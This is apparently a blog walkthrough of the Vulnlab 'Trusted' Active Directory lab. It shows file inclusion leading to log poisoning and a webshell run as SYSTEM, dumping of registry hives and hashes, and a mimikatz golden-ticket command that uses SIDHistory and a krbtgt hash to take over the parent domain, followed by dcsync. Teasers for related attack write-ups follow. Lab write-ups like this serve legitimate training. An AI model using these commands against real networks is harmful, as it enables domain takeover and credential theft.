Loading...

Vulnlab - Trusted

Created2025-05-29|Updated2025-07-15|writeups

|Post Views:

Initial access

Thanks to the nmap scan, we quickly discover that one of the servers hosts an xampp server. By listing its directories, we discover a website:

After browsing the site, we notice that it is potentially vulnerable to a BIA:

This is confirmed by accessing the server log on the following link:

http://10.10.162.134/dev/index.html?view=C:/xampp/apache/logs/access.log

In this way, you can gain access to the machine by log poisoning. To do this, we send a request with php code to the user agent :

curl -A “ “ http://10.10.162.134/

Next, we can check that the webshell is functional by executing a command:

1	curl "http://10.10.162.134/dev/index.html?view=C:/xampp/apache/logs/access.log&cmd=whoami"

The output of the command “nt authority\system :

You can then obtain a reverse shell:

Next, we extract the SAM, SECURITY and SYSTEM registers:

Then retrieve and parse them with secretsdump:

You can also retrieve the hash of the cpowers account using mimikatz:

This allows us to compromise the first DC:

Exploiting the relationship of trust

To compromise the second DC, we must first note that a bidirectional trust relationship exists between the two domains:

We can see that the domain we’ve compromised is the child of the trusted.vl domain. To exploit this, we’ll use SIDHistory

When a user is migrated from one domain to another, his old SID is stored in the SIDHistory attribute in TGT tickets. This preserves access without having to reconfigure all ACLs.
The problem is that parent domains attribute the user’s rights corresponding to the SIDHistory without checking whether the ticket comes from a trusted domain. So, by generating a ticket with the SIDHistory of the parent domain’s integrated administrator, it can be compromised.

To do this, we start by retrieving the SID of the parent domain:

1	lsadump::trust /patch

Next, we can forge a golden ticket with the parent domain administrator’s sidhistory with the following command:

kerberos::golden /user:Administrator /krbtgt:c7a03c565c68c6fac5f8913fab576ebd /domain:lab.trusted.vl /sid:S-1-5-21-2241985869-2159962460-1278545866 /sids:S-1-5-21-3576695518-347000760-3731839591-500 /ptt

Next, you can retrieve the NTDS database of the parent domain with the command :

1	lsadump::dcsync /domain:trusted.vl /dc:trusteddc.trusted.vl /all

ActiveDirectory Vulnlab

Related Articles

Vulnlab - Hybrid

Hybrid is an Active Directory chain containing a Windows machine and a Linux machine. Initial access is gained by compromising the Linux machine, then the domain can be compromised using an ADCS attack. EnumerationWe start by running an nmap scan on the ips provided. 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374┌──(kali㉿kali)-[~/ctf/vulnlab/hybrid]└─$ nmap -A -iL ipsStarting Nmap 7.94SVN ( https://nm...

Vulnlab - Heron

Heron is a medium-difficulty lab. The scenario assumes an initial compromise on a Linux machine attached to a domain, requiring a pivot to a domain controller in an attempt to compromise it. EnumerationLet’s start with the usual Nmap scan:The scan shows that 10.10.168.69 has no accessible ports, probably due to a firewall. On the other hand, 10.10.168.70 has port 22 open. This suggests that we should start by connecting to the Linux machine via SSH.The Wiki page tells us that this is a suppos...

SynthesisTea is an Active Directory chain containing 2 machines to be compromised. Initial access is gained by exploiting a CI/CD runner on a Gitea instance, and full domain compromise is possible through the WSUS connection of the domain controller. Initial enumerationLet’s start with an nmap scan of both machines.It looks like we’ve got a domain controller that isn’t behind a firewall and a machine hosting web services.We can retrieve the names of both machines using NetExec : We add t...

DefinitionA very simple attack to retrieve credentials stored in the SYSVOL share, which can be used to gain a shell or escalate privileges. A GPP (Group Policy Preference) is an old-fashioned feature that lets you configure preferences on machines in an Active Directory. Unlike GPOs, GPPs are not strictly applied to machines in an AD domain, and allow users to modify settings after they have been applied. GPPs are often used for : Create desktop shortcuts Configure network drives automatic...

Golden Ticket Attack

A Golden ticket attack is a specific type of attack on the kerberos authentication protocol. Kerberos is used to securely authenticate users and services on a network. What is a Golden ticket attack?The Golden ticket attack exploits the way Kerberos works, and in particular the generation of the TGT by the KDC. If an attacker gains access to the krbtgt account, the account used by the KDC to sign TGTs, an attacker can create fake tickets known as “Golden Tickets”. These tickets allow an attac...

DefinitionThe NTLM protocol is an old authentication protocol used by Windows machines to authenticate at domain or network level. It’s a Challenge / Response protocol, so it lets you authenticate to a server without the password ever passing over the network. This protocol is widely used by companies in conjunction with the Kereberos protocol. Only companies with a good cyber maturity no longer use it, as it’s not easy to do without. How it worksWhen a client wants to authenticate to a ...

Loading Database